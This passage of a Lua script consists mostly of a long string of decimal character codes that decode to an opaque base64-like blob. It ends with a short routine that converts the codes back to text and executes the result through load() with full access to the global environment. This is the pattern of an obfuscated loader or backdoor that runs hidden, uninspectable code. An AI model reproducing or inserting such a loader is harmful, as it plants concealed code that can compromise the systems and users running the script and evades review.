101 80 104 73 81 77 119 56 57 48 107 110 113 47 73 122 82 122 110 118 52 106 66 65 121 55 56 87 105 106 114 82 85 55 110 104 101 119 75 80 106 80 106 113 76 86 87 111 115 103 112 76 72 113 48 120 110 77 110 81 101 110 55 67 55 105 55 66 105 43 47 117 48 98 120 47 79 115 115 102 65 102 110 87 105 104 108 97 70 76 97 65 82 67 75 102 90 74 86 105 121 106 79 110 122 103 88 106 84 121 97 99 99 79 121 99 110 47 106 117 100 75 65 48 100 54 100 106 52 75 82 101 86 98 83 57 110 73 108 68 119 49 70 88 103 111 49 90 106 99 79 43 85 75 88 70 90 113 75 71 54 106 86 98 120 113 87 116 67 50 76 86 56 105 68 56 50 77 107 83 119 84 111 53 80 55 73 84 88 97 115 65 49 99 84 101 99 114 102 85 106 50 119 90 89 54 120 103 48 72 53 108 54 89 112 106 87 57 108 66 66 90 49 90 85 56 55 107 121 78 104 118 55 86 51 97 90 47 85 73 66 108 68 50 113 120 83 55 84 77 106 108 121 113 103 120 65 98 71 107 53 65 85 50 48 83 109 106 83 82 68 51 70 105 99 49 112 101 74 73 75 67 89 51 85 48 83 112 114 117 80 117 113 71 72 83 79 116 75 83 83 54 70 55 109 122 47 87 72 111 114 103 50 107 122 103 113 120 77 56 82 77 105 105 90 110 73 88 114 57 84 82 109 66 75 112 106 87 82 90 104 116 90 116 120 87 104 66 55 72 90 121 97 51 89 103 77 100 83 68 109 109 103 111 76 116 120 74 65 110 111 67 65 50 54 86 120 121 80 113 71 71 79 49 119 75 99 109 65 88 108 72 73 121 89 120 103 53 73 68 80 54 55 83 85 106 113 113 104 97 85 66 113 117 116 103 48 86 57 85 71 107 53 86 50 55 99 49 81 81 119 69 98 87 51 55 78 80 86 49 70 106 65 122 67 101 106 105 85 109 85 97 102 109 87 66 47 49 43 122 114 66 87 77 85 119 75 121 73 67 80 75 107 74 71 69 73 89 113 102 81 57 97 51 79 65 67 51 90 102 84 103 53 89 89 54 108 89 101 72 70 105 112 77 89 111 54 70 78 50 120 114 70 49 100 108 103 74 74 51 81 122 52 43 87 108 115 122 119 70 83 98 89 102 74 99 56 117 65 68 121 81 56 50 114 53 105 110 113 83 52 122 68 55 101 55 109 116 90 117 99 77 120 112 89 53 111 90 68 84 48 90 71 70 68 55 88 53 75 105 77 103 119 67 120 115 114 120 67 52 78 82 84 106 107 109 49 43 97 69 71 112 67 102 89 73 110 78 113 100 86 68 83 110 68 66 100 108 47 77 79 83 104 97 56 43 82 87 98 104 90 109 110 69 78 82 109 57 43 109 53 65 98 77 112 51 69 90 119 51 85 49 65 82 83 101 55 73 49 53 51 78 115 88 112 121 81 66 114 101 116 106 112 80 112 99 74 74 117 73 71 104 88 98 65 43 86 110 87 53 122 66 122 101 90 54 56 75 88 97 88 69 69 111 102 107 85 82 119 85 103 102 87 77 122 110 69 80 99 76 52 120 57 43 75 116 74 75 69 83 43 105 116 110 73 83 52 90 71 76 80 90 83 57 110 65 83 104 74 66 81 88 114 49 67 107 72 121 111 48 81 121 76 74 51 84 53 98 121 97 79 57 43 117 106 68 89 105 81 90 73 84 98 51 116 109 54 114 110 69 103 99 114 122 110 84 98 119 98 55 87 77 122 97 109 70 88 71 56 70 55 119 110 114 71 73 73 103 69 107 118 116 47 122 102 81 66 56 85 65 56 43 118 71 56 87 105 65 52 81 97 104 56 54 106 85 101 105 54 102 67 89 79 72 110 122 107 52 68 86 85 69 66 103 89 73 68 107 70 122 55 52 69 102 82 83 120 77 72 110 103 97 69 76 120 119 116 76 100 111 98 86 73 88 122 81 99 99 77 66 86 86 121 111 79 110 106 52 75 81 71 111 67 89 76 83 109 86 68 77 53 88 72 73 80 72 68 117 48 116 118 73 121 83 75 73 122 43 78 104 84 90 117 97 105 69 79 121 69 52 111 53 107 48 52 117 52 103 119 112 66 113 76 104 113 54 113 66 90 119 88 76 104 52 56 118 105 97 67 74 110 56 68 108 70 87 90 71 114 106 97 48 73 75 84 89 82 67 121 99 73 106 122 109 108 107 68 83 43 121 77 115 69 74 117 67 111 122 98 117 55 104 97 55 53 66 53 79 121 99 65 122 81 49 77 112 88 74 104 78 72 66 100 77 120 73 51 88 50 90 74 105 103 88 79 105 73 85 72 75 110 101 120 73 115 114 121 121 56 71 83 97 76 49 57 111 53 55 71 70 85 70 108 79 122 107 67 76 68 90 97 102 68 75 85 103 79 104 89 50 97 85 108 116 80 79 71 65 79 88 100 122 67 50 111 88 51 122 68 53 67 71 103 106 52 107 81 69 111 107 111 121 81 109 47 66 112 119 111 76 52 115 112 106 54 103 81 85 51 98 97 55 88 106 65 112 67 113 82 89 43 65 107 50 78 87 72 106 118 54 51 48 82 68 69 119 71 111 67 73 54 77 80 67 115 117 74 99 51 74 75 54 90 115 97 84 68 106 85 118 69 67 121 112 53 86 111 99 49 99 98 116 55 52 116 97 68 67 47 55 79 57 102 69 81 101 73 116 113 57 55 54 50 65 109 82 72 106 84 54 116 53 97 55 75 81 43 47 120 111 86 99 76 83 109 54 116 79 81 101 72 87 119 104 89 72 66 103 79 66 66 68 99 107 99 79 118 113 77 104 79 74 80 66 90 108 84 119 73 65 65 73 80 78 49 81 66 51 108 107 115 82 57 114 56 84 53 84 82 71 47 112 106 107 49 50 99 52 55 114 74 104 77 84 121 43 65 110 106 88 102 117 118 75 107 69 81 71 103 107 70 67 76 56 82 111 52 75 84 105 90 89 106 97 77 47 67 70 69 48 108 74 90 69 106 90 56 102 75 103 115 103 108 56 89 98 89 111 121 105 79 121 70 89 82 115 103 99 103 109 102 100 81 54 66 67 52 105 114 71 119 90 107 101 86 49 113 82 68 90 65 97 88 104 104 86 74 121 66 107 78 107 86 100 68 106 66 105 86 48 49 77 52 43 68 73 120 119 76 117 120 107 74 97 87 103 74 48 120 98 85 109 87 71 89 89 98 75 116 104 104 103 87 86 122 103 52 79 122 115 55 105 105 97 54 77 118 43 88 103 75 73 77 81 113 109 106 84 72 48 47 101 115 101 104 70 108 121 43 98 77 111 107 120 67 68 102 110 121 74 75 89 51 88 120 83 107 71 120 77 68 65 73 79 55 122 100 72 76 51 88 119 78 108 47 51 87 108 100 98 121 122 102 115 84 70 66 65 73 119 110 102 112 76 105 87 80 111 106 57 87 66 53 109 83 113 111 84 104 89 77 118 107 82 109 49 114 121 115 107 104 90 50 72 81 51 118 83 90 108 47 71 66 122 51 113 87 56 43 55 114 50 69 89 55 75 118 113 111 69 101 117 120 84 47 43 120 67 82 81 69 86 103 43 107 120 101 83 43 99 111 83 77 108 104 97 82 75 118 113 115 97 85 74 101 106 104 97 111 72 55 86 80 88 81 71 112 87 79 79 65 65 48 97 69 85 112 72 69 74 88 103 73 115 54 66 47 72 75 68 48 110 88 85 97 71 52 61"
local function fromASCII(str)
local bytes={}
for num in str:gmatch("%d+")do
table.insert(bytes,string.char(tonumber(num)))
end
return table.concat(bytes)
end
local decodedCode=fromASCII(encodedCode)
local f=assert(load(decodedCode,"=wrapper","bt",_G),"Script loading failed")
f()
end
end)
end